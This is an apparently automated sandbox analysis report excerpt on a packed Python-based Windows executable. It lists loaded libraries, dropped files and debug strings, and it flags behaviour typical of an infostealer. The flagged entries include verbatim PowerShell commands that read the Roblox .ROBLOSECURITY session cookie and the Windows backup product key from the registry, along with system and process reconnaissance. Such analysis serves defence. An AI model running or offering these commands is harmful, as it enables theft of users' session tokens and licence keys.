              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: e45AiBoV6X.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: e45AiBoV6X.exeStatic file information: File size 6146615 > 1048576
              Source: e45AiBoV6X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: e45AiBoV6X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: e45AiBoV6X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: e45AiBoV6X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: e45AiBoV6X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: e45AiBoV6X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: e45AiBoV6X.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: e45AiBoV6X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: e45AiBoV6X.exe, 00000001.00000002.1995160650.00007FFE1025B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: e45AiBoV6X.exe, 00000001.00000002.1997954782.00007FFE130C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: e45AiBoV6X.exe, 00000001.00000002.1996506357.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: e45AiBoV6X.exe
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: e45AiBoV6X.exe, e45AiBoV6X.exe, 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: e45AiBoV6X.exe, 00000001.00000002.1992435238.00007FFDFB77F000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: e45AiBoV6X.exe, 00000001.00000002.1997119035.00007FFE126C1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: e45AiBoV6X.exe, 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: e45AiBoV6X.exe, 00000001.00000002.1997695526.00007FFE12E11000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: e45AiBoV6X.exe, 00000001.00000002.1994462832.00007FFE0EC41000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: e45AiBoV6X.exe, 00000001.00000002.1994882993.00007FFE101D1000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: e45AiBoV6X.exe, 00000001.00000002.1995160650.00007FFE1025B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: \bx.pdb source: powershell.exe, 00000025.00000002.1868678671.00000296ED014000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000041.00000000.1882689611.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: e45AiBoV6X.exe, 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.pdb source: powershell.exe, 00000025.00000002.1843488107.0000029680385000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: e45AiBoV6X.exe, 00000000.00000003.1716520142.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1997442294.00007FFE126F1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: e45AiBoV6X.exe, 00000001.00000002.1996803109.00007FFE11EC1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: e45AiBoV6X.exe, 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: e45AiBoV6X.exe, 00000001.00000002.1995817192.00007FFE10301000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.pdbhP source: powershell.exe, 00000025.00000002.1843488107.0000029680385000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: e45AiBoV6X.exe, 00000001.00000002.1989811289.00007FFDFAFEC000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: e45AiBoV6X.exe, e45AiBoV6X.exe, 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
              Source: e45AiBoV6X.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: e45AiBoV6X.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: e45AiBoV6X.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: e45AiBoV6X.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: e45AiBoV6X.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB354460 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFB354460
              Source: libcrypto-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x110586
              Source: libffi-7.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9bb1
              Source: python310.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x170f8b
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xe78a
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x5531f
              Source: e45AiBoV6X.exeStatic PE information: real checksum: 0x5e31e3 should be: 0x5e8567
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x174bf
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1721f
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9ae0f
              Source: libssl-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x3d34c
              Source: bohkan2x.dll.44.drStatic PE information: real checksum: 0x0 should be: 0x1059a
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xbdb3
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xf3db
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x28949
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xc47c
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x12cec
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x213c2
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1ae1a
              Source: libffi-7.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEEA2F5 push rsp; retf 1_2_00007FFDFAEEA2F6
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE92F4 push r10; retf 1_2_00007FFDFAEE9360
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE6C31 push r10; ret 1_2_00007FFDFAEE6C33
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE9C12 push rsp; retf 1_2_00007FFDFAEE9C13
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE91B3 push rdi; iretd 1_2_00007FFDFAEE91B5
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEEA174 push rsp; ret 1_2_00007FFDFAEEA175
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE6F42 push r12; ret 1_2_00007FFDFAEE6F5A
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE8F0E push r12; ret 1_2_00007FFDFAEE8F35
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE6EE0 push r12; ret 1_2_00007FFDFAEE6EFE
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE6EC6 push r10; retf 1_2_00007FFDFAEE6EC9
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE6EAB push rsi; ret 1_2_00007FFDFAEE6EAC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE6E9C push rsp; iretd 1_2_00007FFDFAEE6E9D
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE8E76 push rbp; iretq 1_2_00007FFDFAEE8E77
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE77FA push rsi; ret 1_2_00007FFDFAEE7831
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE6F9D push r10; ret 1_2_00007FFDFAEE6FB0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE8F63 push r12; iretd 1_2_00007FFDFAEE8F7A
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE6F64 push r8; ret 1_2_00007FFDFAEE6F6C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE6D06 push r12; ret 1_2_00007FFDFAEE6D08
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE6CFA push rdx; ret 1_2_00007FFDFAEE6D01
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE6CDC push r8; ret 1_2_00007FFDFAEE6CE9
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEEA4B9 push rdx; ret 1_2_00007FFDFAEEA510
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE6E54 push rdi; iretd 1_2_00007FFDFAEE6E56
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE6E0B push rsp; ret 1_2_00007FFDFAEE6E13
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE85B7 push r12; ret 1_2_00007FFDFAEE85F3
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE9D95 push rsp; iretq 1_2_00007FFDFAEE9D96
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE856C push rbp; retf 1_2_00007FFDFAEE8585
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9ACFD2A5 pushad ; iretd 6_2_00007FFD9ACFD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9AE100BD pushad ; iretd 6_2_00007FFD9AE100C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9AE1862D push ebx; ret 6_2_00007FFD9AE186CA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9AE1861D push ebx; ret 6_2_00007FFD9AE1862A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9AEE9266 push esi; ret 6_2_00007FFD9AEE9267
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\python310.dllJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\libssl-1_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\libffi-7.dllJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\libcrypto-1_1.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.dllJump to dropped file
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802\_ctypes.pydJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
